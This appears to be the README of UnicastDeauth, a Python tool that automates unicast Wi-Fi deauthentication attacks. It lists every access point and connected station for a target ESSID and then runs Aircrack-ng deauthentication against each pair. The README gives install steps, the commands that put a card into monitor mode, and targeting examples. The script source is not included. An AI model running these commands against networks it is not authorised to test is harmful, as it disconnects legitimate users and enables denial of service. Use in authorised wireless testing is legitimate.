UnicastDeauth

• What?
• Why?
• Installation
• Usage
• Disclaimer
• Acknowledgements and references

What?

UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks. In order to do so, it identifies all access points (APs) emitting the target ESSID and all connected stations (STAs), launching Aircrack-ng's typical deauthentication for each AP-STA tuple.

Why?

As some STAs ignore broadcast deauthentication frames, I've had to grab BSSIDs from airodump-ng to later specify them in aireplay-ng many times, so I thought of automating this process to save some time.

Installation

git clone 'https://github.com/mamatb/UnicastDeauth.git'
pip install -r './UnicastDeauth/requirements.txt'

Usage

As with all tools using Wi-Fi cards in monitor mode, first kill all processes that could interfere and then configure the Wi-Fi interface (as root):

airmon-ng check kill
ip link set dev "${WIFI_INTERFACE}" down
iw dev "${WIFI_INTERFACE}" set monitor control
iw dev "${WIFI_INTERFACE}" set channel "${WIFI_CHANNEL}"
ip link set dev "${WIFI_INTERFACE}" up

After that just follow the help section of the script:

usage: UnicastDeauth.py [-h] -i WIFI_INTERFACE -e ESSID [-b] [-n DEAUTH_ROUNDS] [-tl APS_TARGETLIST] [-wl APS_WHITELIST]

UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks

options:
  -h, --help          show this help message and exit
  -i WIFI_INTERFACE   attacker Wi-Fi interface
  -e ESSID            target ESSID
  -b                  enable broadcast deauthentication
  -n DEAUTH_ROUNDS    number of deauthentication rounds
  -tl APS_TARGETLIST  comma-separated known target APs
  -wl APS_WHITELIST   comma-separated APs whitelist

examples:
  UnicastDeauth.py -i wlan0 -e NETGEAR -b
  UnicastDeauth.py -i wlan0 -e NETGEAR -n 8
  UnicastDeauth.py -i wlan0 -e NETGEAR -tl 00:11:22:33:44:00,00:11:22:33:44:55
  UnicastDeauth.py -i wlan0 -e NETGEAR -wl 00:11:22:33:44:00,00:11:22:33:44:55

Disclaimer

Please note that launching deauthentication attacks can be pretty noisy in certain environments. Also remember that they won't work if Protected Management Frames are in use.

Acknowledgements and references

• rsrdesarrollo for helping me understand the Frame Control field and some Scapy basics. He also runs a Wi-Fi hacking suite called pinecone that you should definitely check out if interested in Wi-Fi hacking.
• Scapy's usage documentation
• Aircrack-ng's deauthentication documentation
• mrn-cciew's blogpost "CWAP – MAC Header : Addresses"
• mrn-cciew's blogpost "802.11 Mgmt : Deauth & Disassociation Frames"